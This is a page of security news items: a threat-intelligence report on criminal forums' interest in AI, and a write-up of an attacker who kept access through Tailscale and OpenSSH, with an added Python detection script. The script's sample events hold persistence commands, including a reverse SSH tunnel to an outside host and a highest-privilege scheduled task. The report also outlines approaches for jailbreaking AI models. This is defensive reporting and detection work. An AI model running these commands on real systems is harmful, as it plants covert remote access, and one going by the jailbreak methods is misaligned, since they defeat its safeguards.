
AnonymousMedia.org

  • AI in the underground: Curiosity, claims, and concerns


    Counter Threat Unit™ (CTU) researchers have observed artificial intelligence (AI) emerging as a prominent topic in underground communities, with threat actors discussing its potential, claiming its use for malware and tool development, and expressing concerns. Many claims have not been validated, but the posts reveal perceptions about generative AI and examples of how it may be used in cybercriminal activity. In some respects, threat actors are facing the same challenge as everyone else — seeking to preserve economic viability during a technological transition while trying to identify how and when to embrace AI.

    Access and knowledge sharing

    Defenders and threat actors test and experiment with AI-enabled capabilities, but from very different positions. Defenders typically benefit from greater access to commercial tooling, dedicated engineering support, and the financial freedom to trial emerging technologies at scale. In contrast, resource-constrained threat actors are looking for practical ways to gain access.

    CTU™ researchers have observed API keys for generative AI tools being sold via shared accounts, brokered access, and alternative platforms. In one thread, the “CyberThreat” persona offered brokered API keys for tools such as ChatGPT, Claude, and Grok (see Figure 1). In another post, “VOLTIC” advertised access to multiple AI models as a cost-effective solution for buyers who need AI capabilities (see Figure 2). Although both personas were new to the underground marketplaces, the posts quickly attracted interest and other personas endorsed the services.

    Figure 1: CyberThreat selling brokered API keys

    Figure 2: VOLTIC advertising an unlimited AI tool

    While API keys and associated generative AI chatbots are available for sale across underground forums, there appears to be a knowledge gap. Personas turn to each other for guidance ranging from basic setup and access through to practical tradecraft. New channels focused on AI and large language models (LLMs) and their use continually emerge on underground forums (see Figure 3). Threads include discussions about “jailbreaking” public AI models, including efforts to bypass censorship and other safeguards imposed by AI vendors. Personas frequently reference experimentation with prompt‑based techniques to circumvent content controls, including role‑play framing, multi‑stage prompting, contextual manipulation, and iterative refinement. CTU researchers have also observed self-described “experienced AI users” sharing examples and lessons learned, including prompt templates, workflows, examples of LLM experimentation, and purported best practices for operationalizing AI in malicious scripting and automation.

    Figure 3: Sample of posts on a channel dedicated to AI and machine learning (ML) questions

    Since January 1, 2026, CTU researchers have noted an increase in offers to hire, or partner with, specialists who can operationalize AI on others’ behalf. Multiple personas known for recruiting various roles (e.g., blockchain developers, coders, social engineers) advertised for AI prompt engineers (see Figure 4). The offering of specialized services is common within underground communities, enabling threat actors to monetize their skills and giving cybercriminals access to expertise and capabilities they lack.

    Figure 4: Recruitment post for an OpenAI prompt engineer

    Social engineering and deception

    Threat actors are exploring AI to enhance social engineering and deception techniques, although only a limited number currently incorporate generative AI into their toolkits. Forum posts suggest that generative AI models can be integrated into common fraud and intrusion workflows to help threat actors overcome language barriers, maintain consistency, distribute content at scale, and rapidly iterate lures across email, SMS, messaging platforms, and voice channels. Notably, CTU researchers have observed advertisements for realistic voice bots for vishing and call-based fraud (see Figure 5). Threat actor claims and positive reviews suggest that these bots can be trained or prompted to emulate tone, cadence, and conversational patterns.

    Figure 5: Advertisement for an AI Telegram voice bot

    Some personas have expanded beyond voice bots to AI models. On multiple forums, the “HackingRealm” persona advertised an AI OnlyFans Models service to create credible, scalable personas for romance fraud and other social engineering campaigns. In addition to drafting and refining conversational messages, advertised services claim to generate synthetic profile imagery that mimics authentic individuals. HackingRealm’s Telegram channel also links to a website for model creation (see Figure 6) that includes a page listing positive feedback from users.

    Figure 6: AI model creation website

    Malware and tooling

    Threat actors are advertising AI-enabled tools and malware on various underground communities. The following examples were posted on English-language cybercrime marketplaces. CTU researchers have not validated the claimed capabilities but selected these samples to demonstrate the breadth and depth of tools and malware marketed as “AI-led” or “AI-enabled.” Several of the tools are open source, and the threat actors encourage forum members to explore how legitimate AI tools can be used for malicious purposes.

    Leak Bazaar

    On March 25, 2026, the “Snow” persona announced SnowTeam’s launch of Leak Bazaar, a platform dedicated to the exchange of stolen corporate data (see Figure 7). Over more than four years, Snow has contributed over 400 posts and garnered more than 600 positive reactions, demonstrating consistent engagement and earning the trust of the community. The announcement mentions the platform’s machine learning-enabled analysis and reverse engineering capabilities, emphasizing its aim to help threat actors efficiently monetize large datasets while enabling buyers to purchase targeted segments rather than entire collections. Leak Bazaar purportedly leverages automation and machine learning (ML) to triage massive volumes of data, filter out “system junk,” and apply natural language processing (NLP) to extract and organize relevant content, further supporting the platform’s value proposition.

    Figure 7: Announcement of Leak Bazaar launch

    ApexAI

    On April 12, “ApexDev” introduced the Apex AI tool intended for “carding, hacking, and malware creation” (see Figure 8). This malicious tool is unrelated to the legitimate ApexAI tool. ApexDev claimed that Apex AI utilizes advanced techniques, including log analysis for pattern recognition and adaptive network configuration to support the operation of malicious processes. Furthermore, the tool can purportedly generate a range of malware types, such as stealers and trojans, and it also includes code optimization, analysis, and debugging features.

    Figure 8: Apex AI announcement by ApexDev

    ApexDev is primarily associated with website and panel creation, as well as sniffers, and has received positive feedback. The persona has encouraged other forum users to engage with AI, running competitions and offering $50 for utilities that are created and shared. CTU researchers have identified ApexDev’s name in arbitration sections of forums following complaints about behavior. However, all complaints seem to have been resolved, and the persona continues operations.

    Metatron

    On April 5, the “Wikileaks” persona described an AI-powered penetration testing assistant known as Metatron that operates locally on a user’s system without reliance on cloud services, API keys, or subscriptions (see Figure 9). The tool can leverage a locally hosted AI model to analyze reconnaissance results, identify vulnerabilities, suggest potential exploits, and recommend fixes. Metatron is freely available via GitHub, and third-party reporting has highlighted its use of an agentic loop to support autonomous, iterative analysis. WikiLeaks posted the information to encourage forum members to explore how legitimate tools that leverage AI can be used for malicious activity.

    Figure 9: Metatron description posted by WikiLeaks

    PolyEngine

    In an April 10 post on the ReadTheManual (RTM) forum, the “ADMIN” persona described a polymorphic PE packer named PolyEngine. The post's wording was almost identical to that of an April 9 X (formerly Twitter) post by “Panos Gkatziroulis” that also included a link to a GitHub repository (see Figure 10). PolyEngine was allegedly designed to evade endpoint detection and response (EDR) heuristics and antivirus detection through layered execution methods and obfuscation techniques. ADMIN also claimed to have used AI (“Claude Code”) to refine and implement specific functionality, to improve code quality, and to optimize evasion techniques.

    Figure 10: Nearly identical wording in posts about PolyEngine on the RTM forum (top) and X (bottom)

    As administrator, ADMIN is responsible for maintaining order and trust within the RTM community by enforcing rules, resolving disputes, and overseeing moderation, as well as managing the forum’s technical and structural aspects. This position of authority adds credibility to the persona’s posts.

    Cobalt Strike

    On April 9, the “NightRaider” persona advertised an updated version of Cobalt Strike, highlighting user‑interface improvements and the beta introduction of a REST API (see Figure 11). The API’s features include scripting and task‑tracking capabilities, as well as an MCP server integration with the Claude LLM. NightRaider has predominantly advertised alleged EDR killers but also offers malware such as Cobalt Strike and Brute Ratel. The persona is active in the advice sections of multiple forums and describes themselves as “a man for everything” who focuses on virology and malware.

    Figure 11: NightRaider advertising a Cobalt Strike update

    This post illustrates how threat actors are reframing established offensive tooling as “AI‑enabled” by adding mainstream LLM integrations and automation interfaces to existing workflows. The advertised REST API and MCP support may appeal to buyers looking to script tasking and add lightweight task tracking around post‑exploitation. The post also reflects a broader trend of using “agentic” and LLM‑integrated branding as a differentiator, even when it primarily enables convenience and automation rather than new tradecraft.

    AI-assisted cyberattacks

    Personas have discussed the use of public AI assistants for intrusion activity. Figure 12 shows a post by the Rehub forum administrator about a threat actor’s use of Claude to support a cyberattack against Mexican government networks and steal data, and the attacker’s attempted use of ChatGPT to gather additional information. The poster’s position as forum administrator lent credibility and visibility to the story and prompted other members to discuss and exchange instances of stolen Claude code, further fueling dialogue around the use of AI in cyberattacks.

    Figure 12: Post describing the use of AI in an attack on Mexican government networks

    In another example, the “GhostVibe” persona claimed to be seeing an increase in AI-assisted malware within their own sample analysis, citing “better phishing generation,” improved coding, and “faster adaptation” against defensive controls (see Figure 13). The threat actor also framed AI as a way to improve payload and scripting quality and invited others to share similar observations. The post gained interest from fellow forum members.

    Figure 13: GhostVibe discussing AI-assisted malware

    Additionally, CTU researchers have observed claims that AI prompts and generated data may be captured as collateral in cyberattacks. As more organizations deploy AI across their environments, the potential exposure of this type of data is likely to increase, reinforcing the importance of secure implementation and continuous monitoring.

    Skepticism and speculation

    CTU researchers have observed uncertainty across underground forums and Telegram channels about how AI may reshape roles, pricing, and competitive advantage within the cybercrime economy. Personas express concern that AI will reduce work opportunities, particularly for manual services such as malware development and scripting (see Figure 14). Some also discredit the use of AI, encouraging others to rely on their own capabilities and human skillsets.

    Figure 14: Sample posts discussing concerns around AI’s impact on jobs

    On April 7, 2026, Anthropic announced a cybersecurity initiative named Project Glasswing that was prompted by capabilities observed in its unreleased frontier AI model, Claude Mythos Preview. Anthropic assessed that the model could autonomously identify and chain software vulnerabilities at a level comparable to highly skilled human researchers and therefore chose not to release it publicly. This claim sparked discussions involving established members of underground forums. Some threat actors remained skeptical (see Figure 15); however, many personas speculated on the use and potential of generative AI (see Figure 16). The posts align with the diverse attitudes toward AI that CTU researchers have observed across forums.

    Figure 15: Skepticism about Mythos

    Figure 16: Reactions to AI in a thread discussing Mythos

    Conclusion

    AI is an ongoing and evolving topic of discussion across underground forums. Threat actors have expressed uncertainty and curiosity about its potential impact, and posts reflect skepticism and doubt as well as active experimentation.

    The sample posts in this analysis not only demonstrate how threat actors imply AI-driven capabilities but also highlight a broader trend of leveraging these narratives for marketing. Personas often seek to legitimize their technical prowess and attract attention, which may inspire others to emulate or innovate upon their approaches. Many posts reference manipulation of legitimate AI tools and services for malicious purposes. Some threat actors may not participate in forum discussions, opting instead to quietly explore the technology’s practical limits and tradecraft implications.

    As AI tooling and capabilities evolve, organizations should continue to prioritize strong cyber hygiene such as timely patching, multi-factor authentication (MFA), and passkey use to reduce exposure to established tradecraft and future AI-assisted acceleration. Defenders should also maintain visibility across their environment to identify and mitigate anomalous activity before attacks escalate.



    06/17/2026
  • Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline


    A French-speaking attacker broke into a small French automotive business, planted a keylogger, and stole banking and email credentials.

    Ordinary stuff, until one move near the end.

    Before his command-and-control server went dark, he installed OpenSSH and Tailscale on a victim’s machine, building a way back in that did not run through the C2 at all. When the Havoc server went offline the next day, his access did not. Eighteen days later, the C2 came back, his agents reconnected on their own, and he carried on.

    Cato Networks captured the whole operation command by command, 339 of them over 33 days, after the operator left his SSH keys and a step-by-step playbook in an open storage bucket. The write-up, published Tuesday by Cato CTRL researcher Vitaly Simonovich, is a rare view of an intrusion from the operator’s keyboard rather than the forensic leftovers.

    The researchers’ lesson is blunt: pulling a C2 server offline is not remediation if the attacker has already built a separate door.

    The actor, handle “Poisson,” is not an APT. Researchers describe a junior operator on what looks like a school schedule, active after 3 p.m. CET with a long midday gap, all of it running on free-tier kit: DuckDNS, Backblaze B2, and a cheap IONOS VPS in Berlin. His tradecraft was thin.

    He leaked his home directory five times, named his storage buckets after his own handle, and left a test file of his own keystrokes typed over and over inside the keylogger package. He failed at roughly half of what he tried. He compromised four machines anyway.

    The chain

    The malware ran almost entirely in memory. A VBScript stager with a sandbox-evasion delay decrypted a PowerShell loader, which pulled down a .NET loader that ran Havoc’s Demon agent without dropping the implant to disk. For elevation, he used Start-Process -Verb RunAs, which is not a silent UAC bypass. It pops the Windows consent prompt and waits for someone to click Yes. On one victim, it took a dozen tries across two days.

    After that came the nailing-down: a scheduled task running at every logon with highest privileges, shellcode injected into Explorer.exe, and a custom-built RustDesk as a backup channel. The credential grabber was a 70-line Python keylogger that wrote keystrokes to a local file, with no beacon and no exfil server. Poisson just logged in, grabbed the file by hand, and ran powercfg to keep the machines from sleeping, so harvesting never paused.

    The move that matters

    On April 7, in a five-hour overnight session, he installed OpenSSH Server and Tailscale, joined the victim’s machine to his private Tailscale network, and set up key-based SSH and a reverse tunnel. Now he could reach the machine over Tailscale’s encrypted mesh with no C2 and no exposed ports.

    The next day, the Havoc infrastructure went offline. Cato does not say why, and it barely matters: the Tailscale path sat on a separate network, so the access lived.

    When the C2 returned on April 26, the agents reconnected automatically, no re-compromise required. Over the final five days, he ran 145 more commands, probed smart-card and certificate stores (a sign he was eyeing certificate-based logins), ran two unexplained executables from a file named Thales.zip for about 32 minutes total, then deleted 17 files and went quiet on May 1.

    What he wanted was narrow. No Mimikatz, no lateral movement, no ransomware, and no sign he took the documents he browsed, from tax records to insurance. Just what people type: banking logins, email passwords, government portals. For a small business owner, that is direct financial exposure.

    None of the tools is new, which is the point. China’s APT31 used Tailscale through 2024 and 2025 to tunnel quietly out of Russian IT firms, Scattered Spider has leaned on legitimate remote-access tools like Ngrok and Fleetdeck, and RustDesk, Poisson’s backup channel, turns up in recent Akira ransomware intrusions.

    The binaries are signed and legitimate, so detection that stops at bad files, not bad behavior, misses them. What Poisson adds is command-level proof that the trick outlives a takedown, run by someone clearly still learning.

    What to watch

    Cato’s hunting list is concrete:

    • Alert when OpenSSH Server installs on a Windows workstation, which is rarely legitimate.
    • Watch for tailscale.exe on machines that have no reason to run a VPN.
    • Look for ssh -R reverse tunnels heading to outside hosts.
    • Check for wscript.exe running .vbs files out of user staging folders.
    • Flag scheduled tasks set to the highest privileges that launch script interpreters.
    • Watch for powercfg standby-timeout changes that keep machines awake.
    • Block DuckDNS.
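
The first six items on that list expressed as detection logic over process-creation events, as an added example that is not from Cato's write-up or the original article. The event field names, the Tailscale allowlist, the staging-folder list and the sample events are constructed assumptions; the DuckDNS block is a DNS-layer control and is not covered here.

```python
import re

# Field names (host, role, image, cmdline) are assumptions modelled on
# process-creation telemetry such as Sysmon Event ID 1; map them to your schema.
VPN_APPROVED_HOSTS = {"it-admin-01"}  # hypothetical allowlist for Tailscale
SCRIPT_HOST = r"\b(powershell|pwsh|wscript|cscript|mshta|cmd)(\.exe)?\b"
STAGING_DIR = r"\\(appdata|temp|downloads|users\\public)\\"  # assumed folders


def _img(event, *names):
    """True when the event's image path ends with one of the executable names."""
    return event["image"].lower().endswith(tuple("\\" + n for n in names))


def _has(pattern, event, flags=re.I):
    """True when the pattern occurs anywhere in the event's command line."""
    return re.search(pattern, event["cmdline"], flags) is not None


RULES = {
    "openssh_server_on_workstation": lambda e: e["role"] == "workstation"
        and (_img(e, "sshd.exe") or _has(r"openssh\.server", e)),
    "tailscale_on_unapproved_host": lambda e: _img(e, "tailscale.exe", "tailscaled.exe")
        and e["host"] not in VPN_APPROVED_HOSTS,
    # -R may be bundled with other flags (-NR); ssh flags are case-sensitive.
    "reverse_ssh_tunnel": lambda e: _img(e, "ssh.exe")
        and _has(r"(?<!\S)-[A-Za-z]*R(?=\s|\d|$)", e, flags=0),
    "wscript_vbs_from_staging_dir": lambda e: _img(e, "wscript.exe")
        and _has(STAGING_DIR + r'[^"]*\.vbs\b', e),
    "schtasks_highest_script_host": lambda e: _img(e, "schtasks.exe")
        and _has(r"/rl\s+highest", e) and _has(SCRIPT_HOST, e),
    "powercfg_standby_timeout_change": lambda e: _img(e, "powercfg.exe")
        and _has(r"standby-timeout", e),
}


def hunt(events):
    """Return sorted (host, rule) pairs for every rule an event trips."""
    return sorted({(e["host"], name) for e in events
                   for name, check in RULES.items() if check(e)})


def _ev(host, image, cmdline, role="workstation"):
    return {"host": host, "role": role, "image": image, "cmdline": cmdline}


# Constructed sample events, not taken from the incident data.
SAMPLE_EVENTS = [
    _ev("compta-pc", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"),
    _ev("compta-pc", r"C:\Program Files\Tailscale\tailscale.exe", "tailscale up"),
    _ev("compta-pc", r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ssh -N -R 2222:localhost:22 user@203.0.113.10"),
    _ev("compta-pc", r"C:\Windows\System32\wscript.exe",
        r'wscript.exe "C:\Users\jean\AppData\Local\Temp\update.vbs"'),
    _ev("compta-pc", r"C:\Windows\System32\schtasks.exe",
        r'schtasks /create /tn Updater /sc onlogon /rl highest /tr "powershell.exe -f C:\ProgramData\u.ps1"'),
    _ev("compta-pc", r"C:\Windows\System32\powercfg.exe",
        "powercfg /change standby-timeout-ac 0"),
    # Benign controls: allowlisted Tailscale host, local (-L) port forward.
    _ev("it-admin-01", r"C:\Program Files\Tailscale\tailscale.exe", "tailscale up"),
    _ev("dev-laptop", r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ssh -L 8080:localhost:80 build@10.0.0.5"),
]

if __name__ == "__main__":
    for host, rule in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Several of these rules firing on one host within a short window is a stronger signal than any single hit, which matches the article's point about looking for the persistence layer behind a C2.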

    The bigger one: when you find a C2, assume it is not the only way in, and go hunting for the quiet persistence layer behind it.

    What was in Thales.zip, and what those two programs did in their 32 minutes on the machine, is the question Cato leaves open. The answer that matters more: the C2 was never the intrusion, just one way into it. Kill it and leave OpenSSH, Tailscale, the scheduled task, and the keylogger running, and the attacker still has a way back in.

    That is the part remediation keeps missing.



    06/17/2026
  • ISC Stormcast For Wednesday, June 17th, 2026 https://isc.sans.edu/podcastdetail/9976



    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.



    06/17/2026